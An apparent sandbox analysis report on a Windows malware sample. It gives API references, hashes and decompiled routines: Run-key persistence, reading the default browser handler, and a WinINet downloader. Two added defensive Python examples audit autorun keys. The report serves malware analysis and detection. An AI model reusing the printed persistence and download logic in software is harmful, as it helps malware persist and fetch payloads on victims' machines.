                                  • Shell_NotifyIconA.SHELL32(00000002,0041C200), ref: 00413D0C
                                  • ExitProcess.KERNEL32 ref: 00413D14
                                  • CreatePopupMenu.USER32 ref: 00413D1C
                                  • AppendMenuA.USER32 ref: 00413D31
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                  • String ID: Close
                                  • API String ID: 1657328048-3535843008
                                  • Opcode ID: 9fa95a8da91032cbadd5b612f76443252f964982233fd8ca9fbdea8ba32e519c
                                  • Instruction ID: 3a9117e372e52b2e565462b42d507c4b1172ca251bbe850fbb6b863f13e0a9c7
                                  • Opcode Fuzzy Hash: 9fa95a8da91032cbadd5b612f76443252f964982233fd8ca9fbdea8ba32e519c
                                  • Instruction Fuzzy Hash: 3A210972180609FBDB115FA4ED0DBEA3F35FB08702F208021F606A51B1D7799AA0EB5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
			E00407D53(void* __ecx, char _a4, char _a8, char _a12, char _a16) {
				// Persistence writer. _a4, _a8 and _a12 are flags that select, in turn, the HKCU Run key,
				// the HKLM Run key and the HKLM Policies\Explorer\Run key; _a16 is the string forwarded to
				// the registry helper (the decompiler notes 0x415a24 at these call sites).
				// E0040B7B9 wraps RegCreateKeyW / RegSetValueExW / RegCloseKey (see its subcall refs in the
				// API list below). L0041416A / L00414146 are thunks to the MSVCP60 wstring operator+ imports
				// (refs 00407D7A / 00407D84 below) that prepend and append the quote character _t26 points at,
				// so the data written is a double-quoted path. 0x80000001 = HKEY_CURRENT_USER,
				// 0x80000002 = HKEY_LOCAL_MACHINE. Trailing comments give the address of each statement.
				char _v20;
				void* _t13;
				void* _t15;
				char* _t26;
				void* _t27;
				void* _t32;
				void* _t35;

				_t26 = "\"";                                                          // 0x00407d60
				if(_a4 == 1) {                                                        // 0x00407d6a
					_t35 = _t27 - 0x10;                                               // 0x00407d71
					L0041416A();                                                      // 0x00407d7a
					L00414146();                                                      // 0x00407d84
					_t3 =  &_a16;                                                     // 0x00407d8c  (decompiler: 0x415a24)
					_t13 = E0040B7B9(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",  *_t3, _t35,  &_v20,  &_v20, _t26, 0x41ba28); // 0x00407d99  HKCU Run
					_t27 = _t35 + 0x38;                                               // 0x00407d9e
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1); // 0x00407da4
				}
				if(_a8 == 1) {                                                        // 0x00407dae
					_t32 = _t27 - 0x10;                                               // 0x00407db5
					L0041416A();                                                      // 0x00407dbe
					L00414146();                                                      // 0x00407dc8
					_t7 =  &_a16;                                                     // 0x00407dd0  (decompiler: 0x415a24)
					_t13 = E0040B7B9(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",  *_t7, _t32,  &_v20,  &_v20, _t26, 0x41ba28); // 0x00407ddd  HKLM Run
					_t27 = _t32 + 0x38;                                               // 0x00407de2
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1); // 0x00407de8
				}
				if(_a12 == 1) {                                                       // 0x00407df2
					L0041416A();                                                      // 0x00407e02
					L00414146();                                                      // 0x00407e0c
					_t15 = E0040B7B9(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _a16, _t27 - 0x10,  &_v20,  &_v20, _t26, 0x41ba28); // 0x00407e21  HKLM Policies\Explorer\Run
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1); // 0x00407e2c
					return _t15;
				}
				return _t13;                                                          // 0x00407e36
			}

                                  APIs
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,0041BA5C,0041BA28,00415A24,?,00408003), ref: 00407D7A
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,0041BA5C), ref: 00407DA4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24,?,00408003), ref: 00407D84
                                    • Part of subcall function 0040B7B9: RegCreateKeyW.ADVAPI32(?,80000002,80000002), ref: 0040B7C6
                                    • Part of subcall function 0040B7B9: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00415628,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,0041BA5C,0041BA28), ref: 0040B7D5
                                    • Part of subcall function 0040B7B9: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,0041BA5C,0041BA28), ref: 0040B7E3
                                    • Part of subcall function 0040B7B9: RegSetValueExW.ADVAPI32(80000002,00407E26,00000000,?,00000000,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24), ref: 0040B7F6
                                    • Part of subcall function 0040B7B9: RegCloseKey.ADVAPI32(80000002,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,0041BA5C,0041BA28), ref: 0040B801
                                    • Part of subcall function 0040B7B9: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 0040B810
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407DBE
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407DC8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,0041BA5C), ref: 00407DE8
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000001,00415628,0041BA28,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407E02
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407E0C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,0041BA5C), ref: 00407E2C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: G@std@@U?$char_traits@V?$allocator@$G@2@@0@G@2@@std@@Hstd@@V?$basic_string@$??1?$basic_string@$V10@V10@@$?c_str@?$basic_string@?length@?$basic_string@CloseCreateValue
                                  • String ID: $ZA$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\
                                  • API String ID: 111787555-1962044633
                                  • Opcode ID: e235326932527ed2226d8983e4f804bb91d78ac99fb475050114bcfa4d032180
                                  • Instruction ID: d86c43b3a5ba32eb059a2cdc2ec90b1b4ffa6c8f934f2ed61d0225c93748e370
                                  • Opcode Fuzzy Hash: e235326932527ed2226d8983e4f804bb91d78ac99fb475050114bcfa4d032180
                                  • Instruction Fuzzy Hash: EE215A72D00114BBD710BAA69C4AEFB7F2CDF91354F440429F91962182E6BA8994C7E6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00000004,?,0040BE54,?,?,00000004), ref: 0040BDAE
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKCU,?,?,00000004), ref: 0040BDC6
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE1E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE2B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@??8std@@D@2@@0@D@2@@std@@V?$basic_string@
                                  • String ID: HKCC$HKCR$HKCU$HKLM$HKU
                                  • API String ID: 2054586871-62392802
                                  • Opcode ID: a466e65ffd345a8b6a55af1eb436ab666088b088688f1f759b6253a5e0949071
                                  • Instruction ID: 2660231c1808b36434503ece8d2e95605cb547f4994df65369f224bebc220479
                                  • Opcode Fuzzy Hash: a466e65ffd345a8b6a55af1eb436ab666088b088688f1f759b6253a5e0949071
                                  • Instruction Fuzzy Hash: 8D01C43A58122AA2CE049AD0EC01ADA7708CF057B2F71007BAE04B76C0CB38D9854BCD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

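The two registry routines above (the persistence writer E00407D53 that populates the HKCU Run, HKLM Run and HKLM Policies\Explorer\Run keys, and the helper at 0040BDAE that compares a root prefix against the strings HKCC/HKCR/HKCU/HKLM/HKU) suggest the check a responder would run on a suspect host. The following is an added example, not code from the sample or from Joe Sandbox: it maps root abbreviations to the predefined HKEY handles seen in the decompiled calls (0x80000001, 0x80000002) and audits a registry snapshot for autorun entries in those three keys whose image lives outside the Windows or Program Files trees. The snapshot, the value names and the paths in it are constructed test data; the "trusted prefix" list and the extra weight given to Policies\Explorer\Run are this example's own heuristics.

```python
"""Autorun-key audit modelled on the sample's persistence routine (added example).

The snapshot below is constructed test data, not output from the sandbox run.
"""
import re
from typing import Dict, List, NamedTuple, Tuple

# Root abbreviations the sample's helper compares against (its string table holds
# HKCC/HKCR/HKCU/HKLM/HKU), mapped to the documented predefined HKEY handles.
# 0x80000001 (HKCU) and 0x80000002 (HKLM) are the roots passed in E00407D53.
ROOT_HANDLES: Dict[str, int] = {
    "HKCR": 0x80000000, "HKCU": 0x80000001, "HKLM": 0x80000002,
    "HKU": 0x80000003, "HKCC": 0x80000005,
}

# The two subkeys E00407D53 writes (under HKCU and/or HKLM).
AUTORUN_KEYS: Tuple[str, ...] = (
    "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
    "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run",
)

# Heuristic (this example's assumption): a legitimate autorun image normally lives here;
# AppData, Temp, ProgramData and the user profile are flagged.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


class Finding(NamedTuple):
    root: int          # predefined HKEY handle, e.g. 0x80000001
    subkey: str
    value_name: str
    image: str
    reason: str


def split_root(path: str) -> Tuple[int, str]:
    """'HKLM\\Software\\X' -> (0x80000002, 'Software\\X'); unknown roots raise ValueError."""
    root, _, rest = path.partition("\\")
    try:
        return ROOT_HANDLES[root.upper()], rest.rstrip("\\")
    except KeyError:
        raise ValueError(f"unknown registry root: {root!r}") from None


def image_from_command(cmd: str) -> str:
    """First token of a Run value: the quoted path if present, else text up to the first space.
    E00407D53 writes its path wrapped in quotes, so the quoted form is the one to expect."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    return cmd.split(" ", 1)[0]


def audit(entries: List[Tuple[str, str, str]]) -> List[Finding]:
    """entries: (key path with root prefix, value name, REG_SZ data). Returns flagged autoruns."""
    wanted = {k.lower() for k in AUTORUN_KEYS}
    findings: List[Finding] = []
    for key_path, value_name, data in entries:
        root, subkey = split_root(key_path)
        if subkey.lower() not in wanted:
            continue
        image = image_from_command(data)
        reasons = []
        if not image.lower().startswith(TRUSTED_PREFIXES):
            reasons.append("image outside Windows/Program Files")
        if subkey.lower().endswith("policies\\explorer\\run"):
            reasons.append("Policies\\Explorer\\Run is rarely used by legitimate software")
        if reasons:
            findings.append(Finding(root, subkey, value_name, image, "; ".join(reasons)))
    return findings


# Constructed snapshot: one benign entry, two entries shaped like the sample's writes,
# and one unrelated key that must be ignored.
SAMPLE_SNAPSHOT: List[Tuple[str, str, str]] = [
    ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "SecurityHealth",
     "C:\\Windows\\System32\\SecurityHealthSystray.exe"),
    ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "updater",
     '"C:\\Users\\victim\\AppData\\Roaming\\update\\update.exe"'),
    ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", "updater",
     '"C:\\ProgramData\\update.exe" -s'),
    ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer", "ShellState", "00 00"),
]

if __name__ == "__main__":
    for f in audit(SAMPLE_SNAPSHOT):
        print(f"root=0x{f.root:08x} {f.subkey}\\{f.value_name} -> {f.image}: {f.reason}")
```

On a live host the snapshot would come from an offline hive (e.g. a parsed SOFTWARE/NTUSER.DAT) or a registry export; the audit itself does not touch the registry, so it runs on an analyst workstation. The Policies\Explorer\Run key deserves the extra weight: it is evaluated by Explorer like the ordinary Run key but is absent from most autorun listings people eyeball.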
                                  APIs
                                    • Part of subcall function 0040B5A2: RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 0040B5C3
                                    • Part of subcall function 0040B5A2: RegQueryValueExW.ADVAPI32(80000000,00412203,00000000,00000000,?,00000400), ref: 0040B5E2
                                    • Part of subcall function 0040B5A2: RegCloseKey.ADVAPI32(80000000), ref: 0040B5EB
                                    • Part of subcall function 0040B5A2: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 0040B60A
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(.exe,00000000,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412210
                                  • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000004,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412223
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 0041222D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412236
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00409BE6,?), ref: 0041224F
                                    • Part of subcall function 0041290A: ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(?,00000000,6B03CB60,?,?,0041225E,?), ref: 00412919
                                    • Part of subcall function 0041290A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?,0041225E,?), ref: 00412937
                                    • Part of subcall function 0041290A: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,0041225E,?), ref: 0041293F
                                    • Part of subcall function 0041290A: ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000,?,?,0041225E,?), ref: 0041294A
                                    • Part of subcall function 0041290A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0041225E,?), ref: 00412954
                                    • Part of subcall function 0041290A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 0041295D
                                    • Part of subcall function 0041290A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 00412975
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00412265
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041226E
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0041227B
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00412284
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@V01@@$??4?$basic_string@?find@?$basic_string@G@1@@V01@V12@$?length@?$basic_string@?replace@?$basic_string@?substr@?$basic_string@CloseOpenQueryValue
                                  • String ID: .exe$http\shell\open\command
                                  • API String ID: 2647146128-4091164470
                                  • Opcode ID: 252b6526ca8ce19ecb12a8c89719758da3f71089f7038446805540d7e0c89632
                                  • Instruction ID: d6ae35875aa51399811599ff5055279212e103e4be7b08956a6055bd29980306
                                  • Opcode Fuzzy Hash: 252b6526ca8ce19ecb12a8c89719758da3f71089f7038446805540d7e0c89632
                                  • Instruction Fuzzy Hash: F011127291061DEBCF04EBE0EC49FFD7738FB48304F544425F512A21A0DA74A148CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%
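The routine above opens HKCR\http\shell\open\command (the default handler for http URLs) with RegOpenKeyExW/RegQueryValueExW into a 0x400-byte buffer, then uses wstring::find(".exe") and substr to cut the command value down to the executable path before a replace-based cleanup in the helper at 0041290A. The following is an added example, not the sample's code: it reproduces that value-to-path reduction in Python so an analyst can predict which binary the sample would resolve on a given host. The command values in it are constructed inputs; returning an empty string for a value with no ".exe", or one too long for the 0x400-byte buffer, is this example's choice, since the page does not show how the sample handles either case.

```python
"""Reduce an HKCR\\http\\shell\\open\\command value to the executable path the
way the decompiled routine does (added example). Command values below are constructed."""
import re

# RegQueryValueExW in the sample is called with cbData = 0x400.
SAMPLE_BUFFER_BYTES = 0x400


def exe_from_open_command(value: str, buf_bytes: int = SAMPLE_BUFFER_BYTES) -> str:
    """Keep everything up to and including the first '.exe', then drop double quotes.

    Steps mirrored from the decompilation: find(".exe") -> substr(0, pos + 4) -> quote
    removal. std::wstring::find is case-sensitive; the match here is case-insensitive
    so a value spelled IEXPLORE.EXE is still resolved (a deliberate generalisation).
    Returns '' when no '.exe' is present or the UTF-16 value (plus NUL) would not fit
    the sample's buffer; both are this example's handling, not the sample's.
    """
    if len(value.encode("utf-16-le")) + 2 > buf_bytes:
        return ""
    m = re.search(r"\.exe", value, flags=re.IGNORECASE)   # regex keeps indices intact for non-ASCII input
    if not m:
        return ""
    return value[:m.end()].replace('"', "")


# Constructed inputs: quoted path with an argument, quoted path followed by several
# arguments, an unquoted path, and a handler that is not an .exe at all.
CONSTRUCTED_VALUES = {
    "ie": '"C:\\Program Files\\Internet Explorer\\iexplore.exe" %1',
    "firefox": '"C:\\Program Files\\Mozilla Firefox\\firefox.exe" -osint -url "%1"',
    "chrome_unquoted": 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe -- "%1"',
    "no_exe": "rundll32 url.dll,FileProtocolHandler %1",
}

if __name__ == "__main__":
    for name, raw in CONSTRUCTED_VALUES.items():
        print(f"{name:16s} -> {exe_from_open_command(raw)!r}")
```

Caveat for anyone reusing this: cutting at the first ".exe" means a directory name that itself ends in ".exe" truncates the path early, and a handler registered through a launcher script or rundll32 yields nothing; both failure modes are inherent in the sample's approach, and a responder checking a host should compare the result against what the key actually contains.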

                                  APIs
                                  • _EH_prolog.MSVCRT ref: 00401EA7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401EDE
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041B310,?,0041B310,0041B290), ref: 00401F05
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F1C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F29
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F36
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F40
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000060), ref: 00401F55
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F5E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F67
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F70
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F79
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V10@0@V?$basic_string@$??0?$basic_string@$D@1@@$?size@?$basic_string@H_prologV01@@_itoa
                                  • String ID:
                                  • API String ID: 3851886811-0
                                  • Opcode ID: 01e573960dee240ea2726ef75e9d492289b20872cd0126e6f5a200e95ae8709c
                                  • Instruction ID: 3c13f4a99a68d7d03b3b7bfc4098c6c0fbf2233efe5d64f965fa74e17679f3d5
                                  • Opcode Fuzzy Hash: 01e573960dee240ea2726ef75e9d492289b20872cd0126e6f5a200e95ae8709c
                                  • Instruction Fuzzy Hash: 3C212FB280010DEBCB05EBD1ED499EEBB78FB54315F14412AF412A7061EB755A48CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 88%
                                  			E00412553(void* __ecx, void* __eflags, char* _a4, void** _a8, unsigned int _a12, signed int _a15) {
                                  				void* _v8;
                                  				char* _v12;
                                  				void* _v16;
                                  				void _v10016;
                                  				void* _t35;
                                  				void* _t36;
                                  				void* _t42;
                                  				void* _t44;
                                  				void* _t46;
                                  				unsigned int* _t55;
                                  				signed int _t57;
                                  				signed int _t58;
                                  				signed int _t64;
                                  				signed int _t74;
                                  				char* _t98;
                                  				void* _t100;
                                  				void* _t101;
                                  				void* _t102;
                                  				void* _t103;
                                  
                                  				E00413ED0(0x271c, __ecx);
                                  				_t55 = _a12;
                                  				_a15 = _a15 & 0x00000000;
                                  				_t98 = 0;
                                  				 *_a8 = 0;
                                  				 *_t55 = 0;
                                  				_t35 = InternetOpenA("user", 1, 0, 0, 0);
                                  				_v16 = _t35;
                                  				_t36 = InternetOpenUrlA(_t35, _a4, 0, 0, 0x80000000, 0);
                                  				_v8 = _t36;
                                  				if(_t36 != 0) {
                                  					_a12 = 0;
                                  					_a4 = 0;
                                  					while(1) {
                                  						_t10 =  &_a12; // 0x415664
                                  						_t42 = InternetReadFile(_v8,  &_v10016, 0x2710, _t10);
                                  						if(_t42 != 0 && _a12 <= _t98) {
                                  							break;
                                  						}
                                  						_t44 =  *_t55 + _a12;
                                  						_push(_t44);
                                  						L00413E84();
                                  						_t57 =  *_t55;
                                  						_t100 = _a4;
                                  						_t58 = _t57 >> 2;
                                  						_v12 = memcpy(_t44, _t100, _t58 << 2);
                                  						_push(_a4);
                                  						_t46 = memcpy(_t100 + _t58 + _t58, _t100, _t57 & 0x00000003);
                                  						_t101 =  &_v10016;
                                  						_t64 = _a12 >> 2;
                                  						memcpy(_t101 + _t64 + _t64, _t101, memcpy(_t46 +  *_t55, _t101, _t64 << 2) & 0x00000003);
                                  						_t103 = _t103 + 0x30;
                                  						L00413EBE();
                                  						_a4 = _v12;
                                  						 *_t55 =  *_t55 + _a12;
                                  						_t98 = 0;
                                  					}
                                  					_push( *_t55);
                                  					L00413E84();
                                  					_t102 = _a4;
                                  					 *_a8 = _t42;
                                  					_t74 =  *_t55 >> 2;
                                  					memcpy(_t102 + _t74 + _t74, _t102, memcpy(_t42, _t102, _t74 << 2) & 0x00000003);
                                  					_a15 = 1;
                                  				}
                                  				InternetCloseHandle(_v16);
                                  				InternetCloseHandle(_v8);
                                  				return _a15;
                                  			}
                                   Code line addresses: 0x0041255b, 0x00412564, 0x00412568, 0x0041256c, 0x00412573, 0x0041257a, 0x0041257c, 0x0041258d, 0x00412591, 0x00412599, 0x0041259c, 0x004125a3, 0x004125a6, 0x004125a9, 0x004125a9, 0x004125bc, 0x004125c4, 0x00000000, 0x00000000, 0x004125cd, 0x004125d0, 0x004125d1, 0x004125d6, 0x004125d8, 0x004125df, 0x004125e6, 0x004125ec, 0x004125ef, 0x004125fa, 0x00412600, 0x0041260a, 0x0041260a, 0x0041260c, 0x00412615, 0x0041261b, 0x0041261e, 0x0041261e, 0x00412622, 0x00412624, 0x0041262a, 0x00412632, 0x00412638, 0x00412642, 0x00412644, 0x00412648, 0x00412652, 0x00412657, 0x0041265f

                                  APIs
                                  • InternetOpenA.WININET(user,00000001,00000000,00000000,00000000), ref: 0041257C
                                  • InternetOpenUrlA.WININET(00000000,0040E1CA,00000000,00000000,80000000,00000000), ref: 00412591
                                  • InternetReadFile.WININET(00000000,?,00002710,dVA), ref: 004125BC
                                  • ??2@YAPAXI@Z.MSVCRT ref: 004125D1
                                  • ??3@YAXPAX@Z.MSVCRT ref: 0041260C
                                  • ??2@YAPAXI@Z.MSVCRT ref: 00412624
                                  • InternetCloseHandle.WININET(?), ref: 00412652
                                  • InternetCloseHandle.WININET(00000000), ref: 00412657
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$??2@CloseHandleOpen$??3@FileRead
                                  • String ID: dVA$user
                                  • API String ID: 3314639739-756348157
                                  • Opcode ID: 2c425c2ac83949829cfd64d28bcc986e464b329bf07d6f53e08b57cf980523a3
                                  • Instruction ID: 2817f394542dad185436be8b0d9cd541a8c5b80d7f45bfec7e57154c42759719
                                  • Opcode Fuzzy Hash: 2c425c2ac83949829cfd64d28bcc986e464b329bf07d6f53e08b57cf980523a3
                                  • Instruction Fuzzy Hash: FC316A31A00229AFCF25DF68D885ADF7FA9FF49350F14406AF909D7250CA74AA90DB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 57%
                                  			E004078BB(void* __ecx) {
                                  				signed int _v5;
                                  				signed int _v6;
                                  				signed int _v7;
                                  				signed int _v8;
                                  				void* _t40;
                                  				void* _t44;
                                  
                                  				_push(__ecx);
                                  				 *0x41b9b8 = 1;
                                  				Sleep( *0x41b9b4);
